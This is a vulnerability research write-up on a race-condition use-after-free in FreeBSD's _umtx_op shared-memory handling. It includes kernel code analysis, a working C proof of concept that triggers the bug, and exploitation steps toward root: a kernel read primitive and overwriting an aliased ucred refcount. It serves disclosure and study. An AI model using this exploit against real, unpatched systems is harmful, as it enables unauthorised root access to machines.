FreeBSD 11.0+ Kernel LPE: Userspace Mutexes (umtx) Use-After-Free Race Condition
Introduction
Since 11.0-RELEASE, the FreeBSD kernel has contained a race condition
in the _umtx_op syscall that leads to an exploitable
use-after-free. The bug affects every version up to and including the
latest release at time of writing, 14.1-RELEASE.
This report discusses the vulnerability in depth and explores exploitation options, leading to one that results in gaining root privileges from any unprivileged user.
I originally discovered the vulnerability sometime last year, but it has since been independently discovered by Synacktiv and patched as of September 2024. As I hadn’t done anything with my research in the meantime, I’ll share it here now.
Vulnerability Overview
FreeBSD 11.0 introduced the _umtx_op syscall for
implementing userland threading primitives. The syscall takes an
“operation” argument that describes the sub-command to perform.
Sub-commands are provided for dealing with mutexes, condition variables,
semaphores and other objects one would associate with threading.
One of the _umtx_op sub-commands is
UMTX_OP_SHM. This sub-command is used for managing
process-wide shared memory handles: creating them, destroying them and
looking them up.
This UMTX_OP_SHM sub-command suffers from a race
condition when it comes to destroying a shared memory handle and this is
the crux of the vulnerability: by racing the destruction of the same
handle at the same time, it’s possible for the destruction logic to run
twice. Racing this with a third thread can result in a file descriptor
with a dangling struct shmfd pointer through its
f_data field.
An in-depth discussion with full details can be found in the Vulnerability Details section.
Exploitation Options
By reallocating into the UAF hole and interacting with the file
descriptor obtained through the vulnerability, we are able to read and
write to other structures on the heap. To make use of this, we need to
understand what other data we could have reallocated into the hole and
then look for interesting ways to manipulate it through the relevant
fileops table: shm_ops in this case.
The struct shmfd is allocated from the general purpose
heap rather than a dedicated zone, greatly increasing our options for
reallocating into the hole. Even so, there does not seem to be an
immediately straightforward option here.
A much simpler approach is to leverage the vulnerability to cause a
double-free in the kernel. Double-frees are not detected by the FreeBSD
kernel and by inducing this condition, we are able to free ourselves
from being limited to shm_ops for interacting with the
backing data: we are able to alias two completely different objects
instead.
Full details of how this works to our advantage are covered in the Exploitation section.
Vulnerability Details
The prototype for the _umtx_op syscall can be found in
/usr/include/sys/umtx.h:
int _umtx_op(void *obj, int op, u_long val, void *uaddr, void *uaddr2);
The entry point in kernel for this syscall is in
sys/kern/kern_umtx.c:
int
sys__umtx_op(struct thread *td, struct _umtx_op_args *uap)
{
static const struct umtx_copyops *umtx_ops;
umtx_ops = &umtx_native_ops;
#ifdef __LP64__
if ((uap->op & (UMTX_OP__32BIT | UMTX_OP__I386)) != 0) {
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
else
umtx_ops = &umtx_native_opsx32;
}
#elif !defined(__i386__)
/* We consider UMTX_OP__32BIT a nop on !i386 ILP32. */
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
#else
/* Likewise, UMTX_OP__I386 is a nop on i386. */
if ((uap->op & UMTX_OP__32BIT) != 0)
umtx_ops = &umtx_native_opsx32;
#endif
[1] return (kern__umtx_op(td, uap->obj, uap->op, uap->val, uap->uaddr1,
uap->uaddr2, umtx_ops));
}
Some accommodation for 32-bit processes running on a 64-bit kernel
is made here, but otherwise our interest moves on to
kern__umtx_op [1].
static int
kern__umtx_op(struct thread *td, void *obj, int op, unsigned long val,
void *uaddr1, void *uaddr2, const struct umtx_copyops *ops)
{
struct _umtx_op_args uap = {
.obj = obj,
.op = op & ~UMTX_OP__FLAGS,
.val = val,
.uaddr1 = uaddr1,
.uaddr2 = uaddr2
};
if ((uap.op >= nitems(op_table)))
return (EINVAL);
[2] return ((*op_table[uap.op])(td, &uap, ops));
}
This function very simply prepares an argument structure and calls
off into a function pointer from the op_table table [2].
Looking at this table, we can see a full list of all of the supported
operations:
static const _umtx_op_func op_table[] = {
#ifdef COMPAT_FREEBSD10
[UMTX_OP_LOCK] = __umtx_op_lock_umtx,
[UMTX_OP_UNLOCK] = __umtx_op_unlock_umtx,
#else
[UMTX_OP_LOCK] = __umtx_op_unimpl,
[UMTX_OP_UNLOCK] = __umtx_op_unimpl,
#endif
[UMTX_OP_WAIT] = __umtx_op_wait,
[UMTX_OP_WAKE] = __umtx_op_wake,
[UMTX_OP_MUTEX_TRYLOCK] = __umtx_op_trylock_umutex,
[UMTX_OP_MUTEX_LOCK] = __umtx_op_lock_umutex,
[UMTX_OP_MUTEX_UNLOCK] = __umtx_op_unlock_umutex,
[UMTX_OP_SET_CEILING] = __umtx_op_set_ceiling,
[UMTX_OP_CV_WAIT] = __umtx_op_cv_wait,
[UMTX_OP_CV_SIGNAL] = __umtx_op_cv_signal,
[UMTX_OP_CV_BROADCAST] = __umtx_op_cv_broadcast,
[UMTX_OP_WAIT_UINT] = __umtx_op_wait_uint,
[UMTX_OP_RW_RDLOCK] = __umtx_op_rw_rdlock,
[UMTX_OP_RW_WRLOCK] = __umtx_op_rw_wrlock,
[UMTX_OP_RW_UNLOCK] = __umtx_op_rw_unlock,
[UMTX_OP_WAIT_UINT_PRIVATE] = __umtx_op_wait_uint_private,
[UMTX_OP_WAKE_PRIVATE] = __umtx_op_wake_private,
[UMTX_OP_MUTEX_WAIT] = __umtx_op_wait_umutex,
[UMTX_OP_MUTEX_WAKE] = __umtx_op_wake_umutex,
#if defined(COMPAT_FREEBSD9) || defined(COMPAT_FREEBSD10)
[UMTX_OP_SEM_WAIT] = __umtx_op_sem_wait,
[UMTX_OP_SEM_WAKE] = __umtx_op_sem_wake,
#else
[UMTX_OP_SEM_WAIT] = __umtx_op_unimpl,
[UMTX_OP_SEM_WAKE] = __umtx_op_unimpl,
#endif
[UMTX_OP_NWAKE_PRIVATE] = __umtx_op_nwake_private,
[UMTX_OP_MUTEX_WAKE2] = __umtx_op_wake2_umutex,
[UMTX_OP_SEM2_WAIT] = __umtx_op_sem2_wait,
[UMTX_OP_SEM2_WAKE] = __umtx_op_sem2_wake,
[3] [UMTX_OP_SHM] = __umtx_op_shm,
[UMTX_OP_ROBUST_LISTS] = __umtx_op_robust_lists,
[UMTX_OP_GET_MIN_TIMEOUT] = __umtx_op_get_min_timeout,
[UMTX_OP_SET_MIN_TIMEOUT] = __umtx_op_set_min_timeout,
};
This gives us a good idea of what the _umtx_op syscall
is really about. For the purpose of this vulnerability, we’re interested
in the UMTX_OP_SHM operation, which is implemented by
__umtx_op_shm [3].
UMTX_OP_SHM
__umtx_op_shm extracts the two key parameters that came
in from the _umtx_op syscall and passes them down to
umtx_shm:
static int
__umtx_op_shm(struct thread *td, struct _umtx_op_args *uap,
const struct umtx_copyops *ops __unused)
{
return (umtx_shm(td, uap->uaddr1, uap->val));
}
umtx_shm is where the main logic lives:
static int
[1] umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
[2] if (__bitcount(flags & (UMTX_SHM_CREAT | UMTX_SHM_LOOKUP |
UMTX_SHM_DESTROY | UMTX_SHM_ALIVE)) != 1)
return (EINVAL);
if ((flags & UMTX_SHM_ALIVE) != 0)
return (umtx_shm_alive(td, addr));
[3] error = umtx_key_get(addr, TYPE_SHM, PROCESS_SHARE, &key);
if (error != 0)
return (error);
KASSERT(key.shared == 1, ("non-shared key"));
if ((flags & UMTX_SHM_CREAT) != 0) {
[4] error = umtx_shm_create_reg(td, &key, &reg);
} else {
[5] reg = umtx_shm_find_reg(&key);
if (reg == NULL)
error = ESRCH;
}
umtx_key_release(&key);
if (error != 0)
return (error);
KASSERT(reg != NULL, ("no reg"));
if ((flags & UMTX_SHM_DESTROY) != 0) {
[6] umtx_shm_unref_reg(reg, true);
} else {
#if 0
#ifdef MAC
error = mac_posixshm_check_open(td->td_ucred,
reg->ushm_obj, FFLAGS(O_RDWR));
if (error == 0)
#endif
error = shm_access(reg->ushm_obj, td->td_ucred,
FFLAGS(O_RDWR));
if (error == 0)
#endif
[7] error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
shm_hold(reg->ushm_obj);
[8] finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
[9] umtx_shm_unref_reg(reg, false);
return (error);
}
This function isn’t too long, but there are a few paths that we need
to understand here. At a high level and before diving into details, it’s
useful to know that the whole purpose of UMTX_OP_SHM
is to manage a registry of shared memory regions: it lets us create new
regions and look up or destroy existing ones.
Beginning with the function signature [1], we see that our controlled
inputs to the function are pretty simple: void *addr and
u_int flags.
umtx shared memory regions are identified/keyed by virtual addresses
in our process and that’s what addr is here. It doesn’t
matter what’s stored at addr in our process – we just have
to provide some memory address as a key.
flags is used to communicate what we want to do to the
region mapped to that addr. It must be one of [2]:
- UMTX_SHM_CREAT: Create a new SHM
- UMTX_SHM_LOOKUP: Look up an existing SHM
- UMTX_SHM_DESTROY: Destroy an existing SHM
- UMTX_SHM_ALIVE: Probe if an address maps to a SHM
We will ignore UMTX_SHM_ALIVE here because it’s largely
uninteresting.
With flags validated to just be one of these, the kernel
then translates addr to a umtx_key [3] and
begins doing work based on what was asked.
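To ground the userland calling convention before diving into the kernel side, here is a minimal sketch of driving each operation (it mirrors the calls used in the proof-of-concept later in this report):
#include <sys/types.h>
#include <sys/umtx.h>

/* The kernel keys the region off this address; its contents are irrelevant. */
static char key;

static void
umtx_shm_example(void)
{
	/* UMTX_SHM_CREAT and UMTX_SHM_LOOKUP return a file descriptor on success. */
	int cfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL);
	int lfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, &key, NULL);

	/* UMTX_SHM_DESTROY returns 0 on success. */
	int rc = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, &key, NULL);

	(void)cfd; (void)lfd; (void)rc;
}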
For UMTX_SHM_CREAT, the kernel uses
umtx_shm_create_reg to allocate a fresh
umtx_shm_reg:
struct umtx_shm_reg {
TAILQ_ENTRY(umtx_shm_reg) ushm_reg_link;
LIST_ENTRY(umtx_shm_reg) ushm_obj_link;
struct umtx_key ushm_key;
struct ucred *ushm_cred;
struct shmfd *ushm_obj;
u_int ushm_refcnt;
u_int ushm_flags;
};
This is the structure that’s part of the global linked list of shared memory regions. There are some important fields to pay particular attention to here:
- ushm_refcnt is a refcount for the entry.
- ushm_obj is the actual shared memory object attached to the registry.
The ushm_obj can live longer than its registry entry, so
it has its own refcount (->shm_refs).
The umtx_shm_create_reg function will create a new
shmfd with ->shm_refs == 1 and a new
umtx_shm_reg with ushm_refcnt == 2. The
refcount is 2 because we have one reference in the registry list and one
for the caller.
If instead of UMTX_SHM_CREAT the kernel is servicing a
UMTX_SHM_LOOKUP or UMTX_SHM_DESTROY action
then an existing SHM needs to be resolved with
umtx_shm_find_reg [5].
If that function succeeds in finding one, it takes a reference on
->ushm_refcnt and returns it.
Either way, if no error occurred then the kernel will now have a
umtx_shm_reg pointer and own one reference.
Continuing on in the code, if the requested action was
UMTX_SHM_DESTROY then umtx_shm_unref_reg is
called with its last argument as true [6]. This function
decrements the ->ushm_refcnt and if the last argument is
true then it also removes it from the registry.
Otherwise, for UMTX_SHM_CREAT or
UMTX_SHM_LOOKUP, the kernel allocates a new file descriptor
[7] and attaches the struct shmfd from the registry entry
to the file [8].
Since a pointer to the struct shmfd is being stored on
the file, a reference on that object is taken with
shm_hold.
Finally we reach umtx_shm_unref_reg for all 3 of these
actions [9]: this drops the refcount taken when it was looked up or
created.
Refcounting and Locking
Referring back to the code in the previous subsection, it’s
interesting to note that locking is only performed when creating or
looking for a umtx_shm_reg.
For example, to look up an existing umtx_shm_reg, the
kernel uses umtx_shm_find_reg:
static struct umtx_shm_reg *
umtx_shm_find_reg(const struct umtx_key *key)
{
struct umtx_shm_reg *reg;
mtx_lock(&umtx_shm_lock);
reg = umtx_shm_find_reg_locked(key);
mtx_unlock(&umtx_shm_lock);
return (reg);
}
Similarly, when a reference is dropped on the
umtx_shm_reg, locking is done internally:
static bool
umtx_shm_unref_reg_locked(struct umtx_shm_reg *reg, bool force)
{
bool res;
mtx_assert(&umtx_shm_lock, MA_OWNED);
KASSERT(reg->ushm_refcnt > 0, ("ushm_reg %p refcnt 0", reg));
reg->ushm_refcnt--;
res = reg->ushm_refcnt == 0;
if (res || force) {
if ((reg->ushm_flags & USHMF_REG_LINKED) != 0) {
TAILQ_REMOVE(&umtx_shm_registry[reg->ushm_key.hash],
reg, ushm_reg_link);
reg->ushm_flags &= ~USHMF_REG_LINKED;
}
if ((reg->ushm_flags & USHMF_OBJ_LINKED) != 0) {
LIST_REMOVE(reg, ushm_obj_link);
reg->ushm_flags &= ~USHMF_OBJ_LINKED;
}
}
return (res);
}
static void
umtx_shm_unref_reg(struct umtx_shm_reg *reg, bool force)
{
vm_object_t object;
bool dofree;
if (force) {
object = reg->ushm_obj->shm_object;
VM_OBJECT_WLOCK(object);
vm_object_set_flag(object, OBJ_UMTXDEAD);
VM_OBJECT_WUNLOCK(object);
}
mtx_lock(&umtx_shm_lock);
dofree = umtx_shm_unref_reg_locked(reg, force);
mtx_unlock(&umtx_shm_lock);
if (dofree)
umtx_shm_free_reg(reg);
}
This locking keeps the reference counting consistent, amongst other
things, but it fails to protect umtx_shm_find_reg from
finding a umtx_shm_reg that’s in the process of being
destroyed.
Consider what happens when UMTX_SHM_DESTROY is
serviced:
1. The umtx_shm_reg is found with umtx_shm_find_reg (->ushm_refcnt++)
2. umtx_shm_unref_reg is called with force == true (->ushm_refcnt--)
3. umtx_shm_unref_reg is called with force == false (->ushm_refcnt--)
The net effect of this operation is to decrease
ushm_refcnt by 1. Until step 2 is completed, however, it’s
still possible to find the same umtx_shm_reg with
umtx_shm_find_reg.
Therefore, by racing two concurrent UMTX_SHM_DESTROY
actions for the same addr, it’s possible to have a net
effect of decreasing the ushm_refcnt by 2 instead.
This is the core vulnerability.
Refcount Analysis
By considering two concurrent threads, Thread A and Thread B, both
executing a UMTX_SHM_DESTROY for the same SHM, we can see
how the refcount value fluctuates.
We start with a simple umtx_shm_reg in the registry. In
this state, ->ushm_refcnt == 1 and
->ushm_obj->shm_refs == 1.
We will use the numbered steps for our analysis:
1. umtx_shm_find_reg => ->ushm_refcnt++
2. umtx_shm_unref_reg(..., true) => ->ushm_refcnt--
3. umtx_shm_unref_reg(..., false) => ->ushm_refcnt--
One possible scenario is:
- Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
- Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
- Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
- Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 1
- Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg FREED
  - As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
  - ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
- Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == -1 (on freed data)
There are only a couple of ways this race can play out because if
either thread hits Step 2 before the other hits Step 1, the
umtx_shm_reg won’t be found. So this is really the only
possible net effect of the race: the last
umtx_shm_unref_reg operates on freed data.
Introduction of a Third Thread
The discovery that the final umtx_shm_unref_reg operates
on freed data is only mildly interesting on first glance. Surely to be
of use we’d have to race an allocation before that last call and have
the decrement be meaningful?
Consider instead what happens if we introduce a third thread to this
race – but this time the thread is performing a
UMTX_SHM_LOOKUP:
- Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
- Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
- Thread C: umtx_shm_find_reg => ->ushm_refcnt++ => ->ushm_refcnt == 4
- Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 3
- Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
- Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 1
- Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg FREED
  - As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
  - ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
- Thread C:
  - Allocate fd in process (falloc_caps)
  - shm_hold(reg->ushm_obj) => ->shm_refs++ (on freed data)
  - Attach reg->ushm_obj (freed) to allocated file (finit)
  - ->ushm_refcnt-- => ->ushm_refcnt == -1
Now because Thread B reached Step 3 before Thread C could call
shm_hold, Thread C has allocated a file in the
process with a dangling f_data: it points to the freed
struct shmfd.
It is of course possible for this race to turn out differently:
Thread C could call shm_hold before Thread B hits Step 3,
in which case f_data will not be dangling.
We can detect the right condition by inspecting the file we get back from Thread C. But before we even do that, we need to check that:
- _umtx_op(UMTX_SHM_DESTROY) in Thread A returned 0 (=> success).
- _umtx_op(UMTX_SHM_DESTROY) in Thread B returned 0 (=> success).
- _umtx_op(UMTX_SHM_LOOKUP) in Thread C returned > 0 (=> success, file descriptor returned).
When all of these conditions are detected, we can then try to trigger
a controlled allocation into the correct kernel malloc
bucket and read some value from our file descriptor to see if it
contains a value we chose.
Looking at shmfd, there are a few candidate fields:
struct shmfd {
vm_ooffset_t shm_size;
vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
Reading out of them requires using a function from the
shm_ops table:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
We do need to be careful, however: some of these functions will
attempt to interact with structures such as the
struct rangelock – and these are expected to contain
legitimate kernel pointers.
The shm_get_seals function is one good candidate, which
can be invoked through fcntl(fd, F_GET_SEALS) and simply
returns the value of ->shm_seals. It should be noted
that this field isn’t present on older versions of FreeBSD, however.
One field that has existed since _umtx_op was first
introduced is shm_mode. This is the file permissions mode
of the shmfd and it’s initialised to O_RDWR
when a shmfd is allocated by
umtx_shm_create_reg:
static int
umtx_shm_create_reg(struct thread *td, const struct umtx_key *key,
struct umtx_shm_reg **res)
{
struct umtx_shm_reg *reg, *reg1;
...
reg = uma_zalloc(umtx_shm_reg_zone, M_WAITOK | M_ZERO);
reg->ushm_refcnt = 1;
bcopy(key, &reg->ushm_key, sizeof(*key));
reg->ushm_obj = shm_alloc(td->td_ucred, O_RDWR, false);
...
Attempting to fchmod (via shm_chmod) to the
same mode will always succeed, but if we’ve replaced the
shm_mode field with something like zeroes, this will
fail.
Therefore, once we’ve observed the desired return values from
_umtx_op across all 3 threads, our next steps should
be:
- Try to force a kernel allocation of zeroes.
- Attempt to fchmod(thread_c_result, O_RDWR).
If the fchmod fails then we know that we’ve triggered
the exact sequence of thread execution that we need.
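As a sketch, with thread_c_result holding the descriptor returned by Thread C, the check reduces to:
#include <fcntl.h>
#include <sys/stat.h>

/*
 * On the intact shmfd we created, re-applying the existing mode always
 * succeeds; once the hole has been reallocated with zeroes, the data that
 * shm_chmod() consults is gone and the call fails.
 */
static int
shmfd_was_clobbered(int thread_c_result)
{
	return (fchmod(thread_c_result, O_RDWR) == -1);
}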
Strategy Proof-of-Concept
With a strategy in hand, we can now write a proof-of-concept that should trigger the vulnerability.
We will assume a modern version of FreeBSD and opt to read the
shm_seals field to detect a successful kernel allocation.
For simplicity, we will use a bogus ioctl(2) call to
attempt a controlled allocation into the correct bucket.
The ioctl(2) technique only gives a transient allocation
– enough to place data for a test – but we will use something more
stable, such as cap_ioctls_limit when building a
functioning exploit (discussed later).
The code for the strategy PoC is:
/*
* cc -pthread -o umtx-poc umtx-poc.c
*/
#define _WANT_FILE
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/umtx.h>
#include <unistd.h>
static volatile int a_ready = 0;
static volatile int b_ready = 0;
static volatile int c_ready = 0;
static volatile int a_result = 0;
static volatile int b_result = 0;
static volatile int c_result = 0;
static void
pin_thread_to_cpu(int which)
{
cpuset_t cs;
CPU_ZERO(&cs);
CPU_SET(which, &cs);
if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, sizeof(cs), &cs))
err(1, "[%s] cpuset_setaffinity", __FUNCTION__);
}
static void *
thread_a(void *key)
{
pin_thread_to_cpu(1);
a_ready = 1;
while (!b_ready || !c_ready); /* wait until both peers are ready */
a_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_b(void *key)
{
pin_thread_to_cpu(2);
b_ready = 1;
while (!a_ready || !c_ready); /* wait until both peers are ready */
b_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_c(void *key)
{
pin_thread_to_cpu(0);
c_ready = 1;
while (!a_ready || !b_ready); /* wait until both peers are ready */
c_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
return NULL;
}
int
main(int argc, char *argv[])
{
char key = 0;
pthread_t ta;
pthread_t tb;
pthread_t tc;
unsigned char aaaa_buffer[sizeof(struct shmfd)];
int seals;
int shmfd;
/* prepare the spray buffer. */
memset(aaaa_buffer, 0x41, sizeof(aaaa_buffer));
/* pin to same CPU as Thread C: */
pin_thread_to_cpu(0);
printf("[+] racing...\n");
for (;;) {
a_ready = 0;
b_ready = 0;
c_ready = 0;
a_result = 0;
b_result = 0;
c_result = 0;
/* create a SHM for the threads to find, but close the fd. */
if (-1 == (shmfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL)))
err(1, "[%s] _umtx_op", __FUNCTION__);
close(shmfd);
if (pthread_create(&ta, NULL, thread_a, &key) ||
pthread_create(&tb, NULL, thread_b, &key) ||
pthread_create(&tc, NULL, thread_c, &key))
errx(1, "[%s] pthread_create failed", __FUNCTION__);
if (pthread_join(ta, NULL) ||
pthread_join(tb, NULL) ||
pthread_join(tc, NULL))
errx(1, "[%s] pthread_join failed", __FUNCTION__);
if (!a_result && !b_result && c_result > 0) {
/* check if we now have a dangling shmfd in c_result: */
ioctl(-1, _IOW(0, 0, aaaa_buffer), aaaa_buffer);
if (0x41414141 == (seals = fcntl(c_result, F_GET_SEALS))) {
printf("[+] success! shm_seals: 0x%x\n", seals);
break;
}
}
close(c_result);
}
return 0;
}
This works as expected:
$ cc -pthread -o umtx-poc umtx-poc.c && ./umtx-poc
[+] racing...
[+] success! shm_seals: 0x41414141
Exploitation
Triggering the umtx vulnerability leaves us in a state where we have
a file descriptor to a file that has a freed
struct shmfd hanging from its f_data pointer.
As demonstrated at the end of the previous section, we can trivially
reallocate into this freed memory and observe the effects.
The shape of a struct shmfd on the latest release at
time of writing is:
struct shmfd {
vm_ooffset_t shm_size;
[1] vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
[2] const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
This is an interesting structure to have control over. Some example fields that could be useful:
- shm_object: This will be a dangling vm_object_t pointer. Reallocating that vm_object_t could provide a nice primitive: e.g. if we can have it reallocated as the vm_object_t backing a file that we’re only able to open for O_RDONLY, the permissions we have on the shmfd (in shm_mode) may allow us to mmap the file as PROT_READ | PROT_WRITE. Using this to gain write access to something like /etc/libmap.conf would lead to a trivial privilege escalation.
- shm_path: We can gain an arbitrary read through this pointer by controlling it and calling fcntl(fd, F_KINFO). That ends up reaching shm_fill_kinfo_locked, which will do a strlcpy from that address into a buffer to return to userland. Systematically increasing that shm_path then allows us to read onwards past '\0' bytes; a sketch follows this list.
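As a sketch of that second primitive (F_KINFO exists on newer releases only; fd is assumed to be our dangling descriptor over a sprayed fake shmfd):
#include <sys/param.h>
#include <sys/user.h>
#include <fcntl.h>
#include <string.h>

/*
 * fcntl(F_KINFO) reaches shm_fill_kinfo_locked(), which strlcpy()s from
 * shm_path into kf_path; with shm_path aimed at an arbitrary kernel
 * address, this leaks the bytes there up to the first '\0'.
 */
static int
kread_string(int fd, char *out, size_t outlen)
{
	struct kinfo_file kif;

	memset(&kif, 0, sizeof(kif));
	kif.kf_structsize = sizeof(kif);
	if (fcntl(fd, F_KINFO, &kif) == -1)
		return (-1);
	strlcpy(out, kif.kf_path, outlen);
	return (0);
}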
Many of the ways we interact with this file descriptor will result in
one of the specialised fileops functions being called. For
this specific type of file, the relevant fileops table is
shm_ops:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
As noted in the previous section, many of these functions interact
with the struct shmfd in a way that expects valid kernel
pointers to exist. This complicates things for targeting some of the
shmfd fields. For example, many of the operations will try
to acquire a range lock, interacting with queues and pointers on both
shm_rl and shm_mtx.
Kernel information disclosure vulnerabilities are not rare on FreeBSD, but it still feels sub-optimal to rely on further vulnerabilities to make good use of this bug.
Writing through shm_uid / shm_gid
One of the shm_ops functions that avoids referencing
pointers from the shmfd struct is
shm_chown:
static int
shm_chown(struct file *fp, uid_t uid, gid_t gid, struct ucred *active_cred,
struct thread *td)
{
struct shmfd *shmfd;
int error;
error = 0;
[1] shmfd = fp->f_data;
mtx_lock(&shm_timestamp_lock);
#ifdef MAC
error = mac_posixshm_check_setowner(active_cred, shmfd, uid, gid);
if (error != 0)
goto out;
#endif
[2] if (uid == (uid_t)-1)
uid = shmfd->shm_uid;
[3] if (gid == (gid_t)-1)
gid = shmfd->shm_gid;
if (((uid != shmfd->shm_uid && uid != active_cred->cr_uid) ||
[4] (gid != shmfd->shm_gid && !groupmember(gid, active_cred))) &&
(error = priv_check_cred(active_cred, PRIV_VFS_CHOWN)))
goto out;
[5] shmfd->shm_uid = uid;
[6] shmfd->shm_gid = gid;
out:
mtx_unlock(&shm_timestamp_lock);
return (error);
}
This function provides the implementation of fchown for
a shmfd and is fairly simple. First, the shmfd
pointer (pointer to the freed data we can control) is taken at [1]. The
uid and gid arguments to fchown
are considered next: we can pass -1 as either of these to
leave each value unchanged, which is handled at [2] and [3].
Next is a permissions check. If we’re attempting to change
shm_uid to anything other than our current
cr_uid, or if we’re trying to change shm_gid
to a group of which we’re not a member [4], then this will fail.
Otherwise the fields are written [5], [6].
Targeting shm_uid and shm_gid this way is
potentially interesting: whatever value happens to be in memory for
those fields can be replaced with our current uid and
gid (or any gid we’re a member of).
We would, of course, have to find a struct to allocate into this
memory that has interesting fields at the shm_uid and
shm_gid offsets.
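As a sketch, with uaf_fd (a name assumed here) being the racy descriptor and a victim object sitting in the hole, the write is a single call:
#include <unistd.h>

static void
overwrite_uid_gid_fields(int uaf_fd)
{
	/*
	 * shm_chown() writes our IDs into whatever object now occupies the
	 * freed slot, at the shm_uid and shm_gid offsets respectively.
	 */
	fchown(uaf_fd, getuid(), getgid());
}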
Looking at the size of struct shmfd, we can see that
struct ucred comes from the same bucket – and,
astonishingly, ucreds are allocated from the general
purpose heap instead of a dedicated zone in FreeBSD:
user@freebsd:~ $ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (x86_64).
(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256
shm_gid happens to overlap the cr_ref
refcount field of ucred:
(lldb) p &((struct shmfd *)0)->shm_gid
(gid_t *) $2 = 0x0000000000000020
(lldb) p &((struct ucred *)0)->cr_ref
(u_int *) $3 = 0x0000000000000020
This means that by allocating into the shmfd hole with a
ucred, we can change the refcount of that
ucred to whatever our gid happens to be. By
changing the refcount to be lower than it should be, we can then trigger
a premature free of the ucred and reallocate a new
credential of our choosing into that hole.
There are many ways to bump the refcount of a ucred; a
simple technique is to make lots of threads. Each created thread will
add to the refcount and reaping will take from it.
